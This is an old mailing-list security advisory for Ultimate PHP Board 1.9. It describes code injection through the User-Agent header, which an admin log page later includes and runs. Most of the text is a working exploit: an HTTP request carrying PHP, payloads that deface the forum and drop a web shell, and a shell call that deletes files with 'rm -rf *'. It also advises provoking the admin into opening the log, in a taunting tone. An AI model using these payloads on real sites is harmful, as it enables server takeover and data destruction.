=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: UPB: Discussion Board/Web-Site Takeover product: Ultimate PHP Board v1.9 [ latest ] vendor: www.myupb.com risk: high date: 05/24/2k3 discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/024.en.txt http://f0kp.iplus.ru/bz/024.ru.txt contact email: euronymousat_private =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- there is serious vuln, that allow to attacker execute random php code. the UPB logs some visitor info [ such as REMOTE_ADDR and HTTP_USER_AGENT ] in text file under `db' directory named `iplog'. then in admin panel board admin can to call admin_iplog.php, that just include `iplog'. Thats 0k, but.. e@some_host$ telnet hostname 80 Connected to hostname at 80 GET /board/index.php HTTP/1.0 User-Agent: <? phpinfo(); ?> when admin call the admin_iplog.php your php code will executed. examples for kodsweb skids: 1. <? system( "echo \'hacked\' > ../index.html" ); ?> will deface forum main page 2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?> will create tcsh.php in wwwroot with httpd privileges. then you just go to http://hostname/tcsh.php?cmd=rm -rf * after inject code through User-Agent field you have wait for admin see the admin_iplog.php. how to make admin see the iplog?? its quite easy == just annoy the admin, use the swearing in board messages, etc. bonus ----- in http://www.securityfocus.com/archive/1/302459 i just wrote about some vuln in prior versions of UPB. and i wanna say, that some described vulns else exists in 1.9!! have a nice day >:E shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, N0b0d13s Team and all russian security guyz!! to kate especially )) hates: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb lamers team == yeah, i really __HATE__ yours!! ================ im not a lame, not yet a hacker ================
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 10:29:21 PDT